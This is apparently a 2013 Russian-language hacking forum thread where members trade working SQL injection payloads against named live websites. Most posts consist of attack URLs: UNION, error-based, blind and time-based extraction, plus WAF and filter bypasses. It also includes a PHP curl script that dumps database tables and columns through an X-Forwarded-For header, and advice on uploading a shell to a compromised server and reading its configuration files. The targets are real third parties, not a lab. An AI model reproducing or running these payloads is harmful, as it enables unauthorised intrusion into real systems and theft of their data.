Всего один столбец. при вводе оператора UNION - Hacker attemp!

winstrool
29.08.2013, 23:57
Unknowhacker said:

Code:
http://www.belavtostrada.by/show.php?category=6'+order+by+1+--+

Всего один столбец. при вводе оператора UNION - Hacker attemp!




http://www.belavtostrada.by/show.php?category=6'and version()+like+'%5%'+--+


фильтр на select

AlkatrasUSA
30.08.2013, 00:42
Unknowhacker said:

Code:
http://www.belavtostrada.by/show.php?category=6'+order+by+1+--+

Всего один столбец. при вводе оператора UNION - Hacker attemp!


Не при UNION, а при SELECT

6'+and+user()+like+'belav%'--+

дальше сам бруть

YaBtr
30.08.2013, 10:14
Unknowhacker said:

Code:
http://kozyrlife.ictv.ua/ru/index/read-news/id/1485524%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12 ,13,14,15,16+--+
http://krasnodar.rtrn.ru/news.asp?view=19418%27+union+select+1,2,3,4,5,6,7, 8,9,10,11,12,13,14,15,16,17,18,19,20+--+ взгляни плз

http://www.tppkuban.ru/search.php?sovpad=1&registr=1&gogo=%E8%F1%EA%E0%F2%FC%27+union+select+1,2,3,4,5, 6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23, 24,25,26,27+--+

http://www.scrutineer.ru/results.php?id=3+and+1=1%27+union+select+1,2,3,4,5 ,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+--+

http://pridb.gdcb.iastate.edu/results.php?searchby=PDB_ID%27+union+select+1,2,3, 4,5,6,7,8,9,10,11,12+--+&q=3J12&interactiontype=dist&distcutoff=5.0

http://tnk.ua/motorist/shop_promo/2013/41%27/ выбивает # article это имеет какое-либо значение к инъекции

P.S Ряд сайтов, которые реагируют на кавычку, но при это скрыт отчёт об ошибке и неизвестно .. есть ли она вообще здесь, стоит ли столбцы подбирать, а то вот YaBtr нашёл аж 407.. это ж чокнуться можно, ладно, если ORDER BY оператором при условии, что отчёт об ошибке не скрыт...


Непонятных моментов будет меньше, если разберешься с различием в раскрутке инъекций в строковыхи числовых уязвимостых параметрах:

http://www.scrutineer.ru/results.php?id=3+order+by+8+--+

Unknowhacker
01.09.2013, 16:24
Подскажите, как в данном случае посимвольно подобрать имя базы данных таблицы через оператора CHAR


Code:
http://ukrcrewing.com.ua/agency%27and%28select*from%28select%28name_const%2 8version%28%29,1%29%29,name_const%28version%28%29, 1%29%29a%29and%27

XAMEHA
01.09.2013, 16:33
Unknowhacker said:
Подскажите, как в данном случае посимвольно подобрать имя базы данных таблицы через оператора CHAR


Вы уверены, что вам надо перебирать именно так, если возможно решить задачу более-результативным путем?

К примеру получаем вывод имени базы данных через error-based, но немного другого типа:


PHP:
http://ukrcrewing.com.ua/agency%27or%201%20group%20by%20concat%28database%2 8%29,floor%28rand%280%29*2%29%29%20having%20min%28 0%29%20--%20

Unknowhacker
01.09.2013, 21:20
Интересная SQL


Code:
seafarer.od.ua/?page=study&course=2+order+by+7+--+

Но при операторах UNION+SELECT выдаёт ошибку будто кол-во столбцов неверно.

XAMEHA
02.09.2013, 04:44
Unknowhacker said:
Интересная SQL

Code:
seafarer.od.ua/?page=study&course=2+order+by+7+--+

Но при операторах
UNION+SELECT
выдаёт ошибку будто кол-во столбцов неверно.


Warning: ibase_query(): Dynamic SQL Error SQL error code = -104 Token unknown - line 1, column 103 group in /var/www/lesozavodsk/study.inc on line 11


PHP:
http://seafarer.od.ua/?page=study&course=2+union+select+1,2,3,4,5,6,7+from+rdb$relat ions+--+

Unknowhacker
03.09.2013, 11:24
нужно обойти фильтр не понятно на что, толи TABLE_NAME; INFORMATION_SCHEMA


Code:
http://www.web-compas.ru/c.php?id=-34%27+union+/*!select*/+1,version%28%29,3,4,5,6,7+--+

на select вроде обошёл

YaBtr
03.09.2013, 12:02
Unknowhacker said:
нужно обойти фильтр не понятно на что, толи TABLE_NAME; INFORMATION_SCHEMA

Code:
http://www.web-compas.ru/c.php?id=-34%27+union+/*!select*/+1,version%28%29,3,4,5,6,7+--+

на select вроде обошёл



Мысль у тебя правильная:


http://www.web-compas.ru/c.php?id=-34'+union+/*!select*/+1,/*!group_concat(table_name)*/,3,4,5,6,7
+/*!from*/+/*!information_schema.tables*/+/*!where*/+/*!table_schema*/ = /*!database()*/+--+

Unknowhacker
03.09.2013, 12:55
YaBtr said:
Мысль у тебя правильная:


Точно, мне показалось, что дальше не прокатит ..

Я вот ещё нашёл


Code:
http://tochka.cn.ua/index.php?cat=0%27+order+by+9+--+
http://www.autoonline.com.ua/news/index.php?id=4736+order+by+9+--+

но при UNION+SELECT = показывает обычную страницу даже есть кол-во столбцов я увеличу.

YaBtr
03.09.2013, 15:12
Unknowhacker said:
Точно, мне показалось, что дальше не прокатит ..
Я вот ещё нашёл

Code:
http://tochka.cn.ua/index.php?cat=0%27+order+by+9+--+
http://www.autoonline.com.ua/news/index.php?id=4736+order+by+9+--+

но при UNION+SELECT = показывает обычную страницу даже есть кол-во столбцов я увеличу.


Здесьtime based

http://www.autoonline.com.ua/news/index.php?id=4736+/*!and*/+/*!if(substr(version(),1,1)=5,SLEEP(5),1)*/+--+

HAXTA4OK
03.09.2013, 16:33
YaBtr said:
Здесь
time based
http://www.autoonline.com.ua/news/index.php?id=4736
+/*!and*/+/*!if(substr(version(),1,1)=5,SLEEP(5),1)*/+--+


мммм,зачем тайм..


http://www.autoonline.com.ua/news/index.php?id=-4736/**/UNION/**//*!SELECT*//**/1,2,version%28%29,4,5,6,7,8,9%23




http://www.autoonline.com.ua/news/index.php?id=-4736/**/UNION/**//*!SELECT*//**/1,2,/*!table_name*/,4,5,6,7,8,9/**//*!from*//**/information_schema.tables/**/limit/**/N,1%23

Unknowhacker
03.09.2013, 22:15
HATA4OK, спасибо, но я уже сделал по другому.


Code:
http://www.cigarettehouse.net/?action=page&name=NEWS&page=-37+/*!union*/+/*!select*/+1,2+--+

Мне не даёт покоя эта ссылка, но как я не крутил не выводится номер столбца -(

BigBear
04.09.2013, 10:06
Unknowhacker said:
HATA4OK
, спасибо, но я уже сделал по другому.

Code:
http://www.cigarettehouse.net/?action=page&name=NEWS&page=-37+/*!union*/+/*!select*/+1,2+--+

Мне не даёт покоя эта ссылка, но как я не крутил не выводится номер столбца -(


И не выведешь. Тут слепая скуля.

Кстати тут удобно использовать метод more1row

Смотри сам:


Code:
http://www.cigarettehouse.net/?action=page&name=NEWS&page=37+and+if(substr((@@version),1,1)=4,1,(select +1+union+select+2))

No error

http://www.cigarettehouse.net/?action=page&name=NEWS&page=37+and+if(substr((@@version),1,1)=5,1,(select +1+union+select+2))

Error

Unknowhacker
04.09.2013, 14:17
BigBear said:
И не выведешь. Тут слепая скуля.
Кстати тут удобно использовать метод
more1row
Смотри сам:

Code:
http://www.cigarettehouse.net/?action=page&name=NEWS&page=37+and+if(substr((@@version),1,1)=4,1,(select +1+union+select+2))

No error

http://www.cigarettehouse.net/?action=page&name=NEWS&page=37+and+if(substr((@@version),1,1)=5,1,(select +1+union+select+2))

Error



А тем более с четвёрки не вытащишь -(

Кто может сказать, что за реагирование на *1


Code:
http://pereprava.com.ua/index.php?id=1*1

YaBtr
04.09.2013, 15:26
Unknowhacker said:
А тем более с четвёрки не вытащишь -(
Кто может сказать, что за реагирование на
*1

Code:
http://pereprava.com.ua/index.php?id=1*1




http://pereprava.com.ua/index.php?id=1*1 (Вывод страницы 1)

http://pereprava.com.ua/index.php?id=1*3 (Вывод страницы 3)

Отсюда следует,что, ВОЗМОЖНО, здесь присутствует инъекция

Unknowhacker
05.09.2013, 10:21
Очередной фильтр SELECT


Code:
http://johnyboy.ru/?page=news&newsid=-999+union+/*!select*/+1,2,3,4,5,6+--+

но зараза оператора AND никак не хочет пропускать /*!and*/ и методом more1row воспользоваться не получится.

XAMEHA
05.09.2013, 17:57
Unknowhacker said:
Очередной фильтр
SELECT

Code:
http://johnyboy.ru/?page=news&newsid=-999+union+/*!select*/+1,2,3,4,5,6+--+

но зараза оператора AND никак не хочет пропускать /*!and*/ и методом
more1row
воспользоваться не получится.


Так используйте что ни будь еще - логические операторы, арифметические, побитовые, сравнения...

Там, помимо основного WAF-а еще несколько фильтров, что они только не фильтруют...

Возможно такой синтаксис:


PHP:
130++div+++((5)+&255)+



Но до раскрутки еще далеко, с полным фильтром на select ничего не получится.

Br@!ns
06.09.2013, 03:30
Имеется скуля с правами рута, файлы заливаются (проверил на /tmp), так же чтение этих файлов через load_file проходит, но вот хз как залиться, в корень на сам сайт не заливается, в папки tmp/logs тоже (джумла стоит там). Разные директории проверил, включая images, нифига. Может я что то не так делаю?)

зы /administrator/ 403, не залиться

XAMEHA
06.09.2013, 06:40
Br@!ns said:
Имеется скуля с правами рута, файлы заливаются (проверил на /tmp), так же чтение этих файлов через load_file проходит, но вот хз как залиться, в корень на сам сайт не заливается, в папки tmp/logs тоже (джумла стоит там). Разные директории проверил, включая images, нифига. Может я что то не так делаю?)
зы /administrator/ 403, не залиться


Возможно прав нет, в большинстве случаев залиться можно только тогда, когда на какую то диру стоять права записи для others, например 777 и сервер в ней что-то исполняет - PHP, SSI, etc...

Надо что-то другое использовать - прочтите виртуальные хосты, другие файлы, конфиги, ищите там полезную инфу...

BigBear
06.09.2013, 08:19
Br@!ns said:
Имеется скуля с правами рута, файлы заливаются (проверил на /tmp), так же чтение этих файлов через load_file проходит, но вот хз как залиться, в корень на сам сайт не заливается, в папки tmp/logs тоже (джумла стоит там). Разные директории проверил, включая images, нифига. Может я что то не так делаю?)
зы /administrator/ 403, не залиться


Если стоит sape, то у них в корне сайта должна быть врайтабельная директория для скриптов сапы, правда закрытая на исполнение .htaccess -ом. Попробуй.

narviss
06.09.2013, 17:49
Можно ли что сделать с этой уязвимостью?


http://www.v3toys.ru/index.php?nid=19109

Br@!ns
08.09.2013, 23:58
Можно ли через havij крутить ссылки типа blabla.com/news/2013 ? Или обязателен уязвимый параметр типа =999 ?

m00c0w
09.09.2013, 03:14
%Inject_Here%

http://www.itsecteam.com/files/havij/havij_help-english.pdf

Unknown
09.09.2013, 21:37
narviss said:
Можно ли что сделать с этой уязвимостью?


нет там ничего...

t3cHn0iD
14.09.2013, 20:51
OxoTnik said:
Да можно, blabla.com/news/
%Inject_Here%
2013


2013 как default injection value выставляется как бы


Br@!ns said:
Можно ли через havij крутить ссылки типа blabla.com/news/2013 ? Или обязателен уязвимый параметр типа =999 ?


Но все же консультация по использованию кракнутого автоматического эксплуататора sql инъекций с уязвимостями никак не вяжется и да, у него есть волшебный файл справки, который называется Help.chm, там есть такой волшебный раздел, который называетсяBasic Settings -> Injecting URL Rewrite Page

Always
16.09.2013, 14:19
http://www.grafomanam.net/author/ADAMANASTAS'+order+by+17+--+

http://www.grafomanam.net/author/ADAMANASTAS'+order+by+18+--+ ошибка

не пойму что не так

http://www.grafomanam.net/author/ADAMANASTAS'+/*!union*/+(select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 )+--+

m00c0w
16.09.2013, 16:09
Always said:
http://www.grafomanam.net/author/ADAMANASTAS'+order+by+17+--+
http://www.grafomanam.net/author/ADAMANASTAS'+order+by+18+--+ ошибка
не пойму что не так
http://www.grafomanam.net/author/ADAMANASTAS'+/*!union*/+(select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 )+--+


Too many connections. Положили сканерами.

kilo_star
16.09.2013, 16:37
Запрос обрабатывается следующим скриптом:

http://s017.radikal.ru/i410/1309/40/24b05eb56a4f.png

?name=root'\**\or\**\1='1

По идее \**\ должно работать как пробел или нет? Скуль не проходит. Как можно обойти?

YaBtr
16.09.2013, 18:31
Always said:
http://www.grafomanam.net/author/ADAMANASTAS'+order+by+17+--+
http://www.grafomanam.net/author/ADAMANASTAS'+order+by+18+--+ ошибка
не пойму что не так
http://www.grafomanam.net/author/ADAMANASTAS'+/*!union*/+(select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 )+--+


Сайт на базе CMS Drupal

Ищите готовые эксплоиты.

BigBear
16.09.2013, 18:35
kilo_star said:
Запрос обрабатывается следующим скриптом:
http://s017.radikal.ru/i410/1309/40/24b05eb56a4f.png
?name=root'\**\or\**\1='1
По идее \**\ должно работать как пробел или нет? Скуль не проходит. Как можно обойти?


root'or(1)='1

kilo_star
16.09.2013, 19:23
BigBear said:
root'or(1)='1


спасибо Так а с применением /**/ можно как-то обойти?

XAMEHA
17.09.2013, 06:55
kilo_star said:
спасибо
Так а с применением /**/ можно как-то обойти?


Рассмотрим данное регулярное выражение:


PHP:
if(preg_match('/\s+/',$_GET["name"])) {

die("ERROR NO SPACE");

}



В строке производится поиск по символьному классу \s, то есть любых пробельных символов - пробел, TAB, etc... Строка, которая их не содержит или строка, длина которой больше pcre.backtrack_limit (в случае с массивом POST) фильтрацию проходит.

Использование /**/ возможно. Зависимости - mg=off поскольку sql-инъекция в кавычках.

XAMEHA
17.09.2013, 09:49
Always said:
http://www.grafomanam.net/author/ADAMANASTAS'+order+by+17+--+
http://www.grafomanam.net/author/ADAMANASTAS'+order+by+18+--+ ошибка
не пойму что не так
http://www.grafomanam.net/author/ADAMANASTAS'+/*!union*/+(select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 )+--+


WAFвырезает некоторые конструкции, а так-же полностью блокирует запрос по рейтингу вхождения в него опасных конструкций.

Очень жестокие фильтры, очень много критериев, в том числе проверяется длина(49 символов):


Code:
http://www.grafomanam.net/author/ADAMANASTAS%27*updatexml(0,lpad(user(),22,0x3A),1) %23

General error: 1105 XPATH syntax error: '::::::::root@localhost'

Все сжимал буквально по одному символу, на один символ больше - уже блок, зато юзер - root При WAF - очень редкое явление.

UDP1:


Code:
http://www.grafomanam.net/author/ADAMANASTAS%27*updatexml(0,concat(0x3A,user()),1)% 23

В этом варианте concat так-же работает, если будет блок - воспользуйтесь вариантом выше.

UDP2:

Еще варианты сжатия:


Code:
При спец. символах в выводе:
http://www.grafomanam.net/author/ADAMANASTAS%27*updatexml(0,user(),1)%23

Без них(Работает не всегда):
http://www.grafomanam.net/author/ADAMANASTAS%27*updatexml(0,concat(':',user()),1)%2 3

UDP4:

Забыл про саму строку:


Code:
http://www.grafomanam.net/author/%27*updatexml(0,concat(':',version()),1)%23

5.5.33-log

Путь очень длинный:


PHP:
/usr/local/www/apache22/data/grafomanam/sites/index.php



Если только блайндом таблицы выводить с брутом полей - на простой вывод идет очень много символов. MySQL на UNIX-сокете висит, так что удаленно не подключится. Или как вариант - обойти ЧПУ, если фильтр на длину в нем.

YaBtr
18.09.2013, 16:37
o3 said:
что с этой скулей не так?
__http://www.fuelthebrain.com/mini-books/print.php?bookID=1329876958' order by 11%23


An appropriate representation of the requested resource could not be found on this server. This error was generated by Mod_Security.

(в Вашем случае фильтруются union и select)

Крутите,как слепую:


http://www.fuelthebrain.com/mini-books/print.php?bookID=1329876958
'+and+substr(version(),1,1)=5 and '1'='1

XAMEHA
18.09.2013, 17:04
YaBtr said:
Крутите,как слепую:


Легче крутить с использованием вывода, второе и третье поля принтабельны:


Code:
1329876958'+/*!%0Dunion%0Dselect%0D*FROM(select 1) a1 join (select version()) a2 join (select 3) a3 join (select 4) a4 join (select 5) a5 join (select 6) a6 join (select 7) a7 join (select 8) a8 join (select 9) a9 join (select 10) a10 join (select 11) a11*/+--+



PHP:
Используем комментарий дл я обхода одного фильтра:

/*!КОД*/

Символ переноса для второ го:

/*!%0Dunion%0Dselect%0D*/

И для третьего фильтра со здаем собственную таблицу через подзапросы,псевдон мы и join:

/*!%0Dunion%0Dselect%0D*FROM(select 1) a1 join (select version()) a2 join (select 3) a3 jo in (select 4) a4 join (select 5) a5 join (select 6) a6 join (select 7) a7 join (sel ect 8) a8 join (select 9) a9 join (select 10) a10 join (select 11) a11*/

XAMEHA
19.09.2013, 10:43
Always said:
http://site.ru/works/247964/
Host: obshelit.ru
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0
x-forwarded-for:1"/**/and/**/(select/**/1/**/from/**/(select/**/(count(*)),concat((select/**/count(*)/**/from/**/information_schema.tables/**/limit/**/50,1),0x00,floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by(x))/**/a)/**/or/**/"
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://site.ru/works/248095/
Начинаю перебирать лимит, все перестает отображаться...в чем проблема?


Вы что, в count(*) лимит перебираете? Работает, пример вывода таблиц с колонками:


PHP:
"http://site.ru/works/247964/",

CURLOPT_RETURNTRANSFER=>True,

CURLOPT_ENCODING=>'gzip, deflate',

));

for ($i=1;true;$i+=64) {

//$main = 'version()';

$main='MID(CONCAT(@p:=0x20,(SELECT COUNT(*) FROM information_schema.columns WHERE TABLE_SCHEMA !=0x696e666f726d6174696f6e5f736368656d61 and @p:= CONCAT(@p,0x3B, TABLE_SCHEMA,0x3A,TABLE_NAM E, 0x3A,COLUMN_NAME) ),@p),5)';



$sql='1"or 1 group by concat( mid(('.$main.'),'.$i.', 64), floor(rand(0)*2)) having min(0) or 1 #' ;

$sql=str_replace(" ","/**/",$sql);



curl_setopt($ch,CURLOPT_HTTPHEADER, array("x-forwarded-for: ".$sql));



$resp=curl_exec($ch);

$resp=explode('Duplicate entry \'',$resp,2);

echostr_replace(";","\n",substr($resp[1],0,64));

}

curl_close($ch);



Выход: Ctrl+C. Запуск в консоли.

vsid55
21.09.2013, 11:07
Ошибка

Ошибка при попытке подключиться к information_schema.tables

+UNION+SELECT+1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,1 6+from+information_schema.tables/*

Query Failed: Can't read dir of './test/' (errno: 13)

Query:Select a.*, b.image_filename, b.image_width, b.image_height from AMJ_Article a left join AMJ_Article_Image b on (a.article_id = b.article_id and b.image_main = 1) where a.article_type = 'TRENDS' and a.article_id = 1 UNION SELECT 1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,16 from information_schema.tables/*

Что это значит?

версия 5.0.22

qaz
21.09.2013, 12:32
vsid55 said:
Ошибка при попытке подключиться к information_schema.tables
+UNION+SELECT+1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,1 6+from+information_schema.tables/*
Query Failed: Can't read dir of './test/' (errno: 13)
Query:Select a.*, b.image_filename, b.image_width, b.image_height from AMJ_Article a left join AMJ_Article_Image b on (a.article_id = b.article_id and b.image_main = 1) where a.article_type = 'TRENDS' and a.article_id = 1 UNION SELECT 1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,16 from information_schema.tables/*
Что это значит?
версия 5.0.22


пишет что не может прочитать дерикторрию тест, так как не хватает прав

cipa21
21.09.2013, 16:57
Добрый день!

при запросе:

?id=-4099+union+select+1,2,3,4,5,@@version,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29,30,31,32,33--

версия выводится замечательно, но если мы заменим @@version на version(), то откроется просто белая страница, сервер фильтрует круглые скобки, невозможно обратиться ни к одной функции из-за этого. Как можно обойти данную проблему?

cipa21
22.09.2013, 02:35
OxoTnik said:
захексить весь запрос


-4099+0x756E696F6E2B73656C6563742B312C322C332C342C3 52C404076657273696F6E2C372C382C392C31302C31312C313 22C31332C31342C31352C31362C31372C31382C31392C32302 C32312C32322C32332C32342C32352C32362C32372C32382C3 2392C33302C33312C33322C3333

Ничего не дало.

kingbeef
22.09.2013, 04:34
Version () захекси, а не всю адресную строку.

XAMEHA
22.09.2013, 07:47
cipa21 said:
Добрый день!
при запросе:
?id=-4099+union+select+1,2,3,4,5,@@version,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29,30,31,32,33--
версия выводится замечательно, но если мы заменим @@version на version(), то откроется просто белая страница, сервер фильтрует круглые скобки, невозможно обратиться ни к одной функции из-за этого. Как можно обойти данную проблему?


Вариант 1: Не использовать функции

Вариант 2: Проверить, попадают ли данные из какой-либо колонки в другой запрос, и есть ли там инъекция. Если да - то можно обойти фильтр посылая данные второй инъекции хексом в колонку.

Вариант 3: NULL-byte, не соответствующие друг другу скобки, Комментарии /*! SQL*/, Символ переноса строки между скобками при фильтре парных скобок version(%0A%0D), etc


OxoTnik said:
захексить весь запрос




kingbeef said:
Version () захекси, а не всю адресную строку.


В MySQL хекс используется только для строк. Захексить функцию, или весь запрос вам не удастся.

Always
26.09.2013, 06:51
http://np.com.ua/search.html?keywords=1'+order+by+2+--+

http://np.com.ua/search.html?keywords=1'+union+SELECT+1,2+--+

Как быть?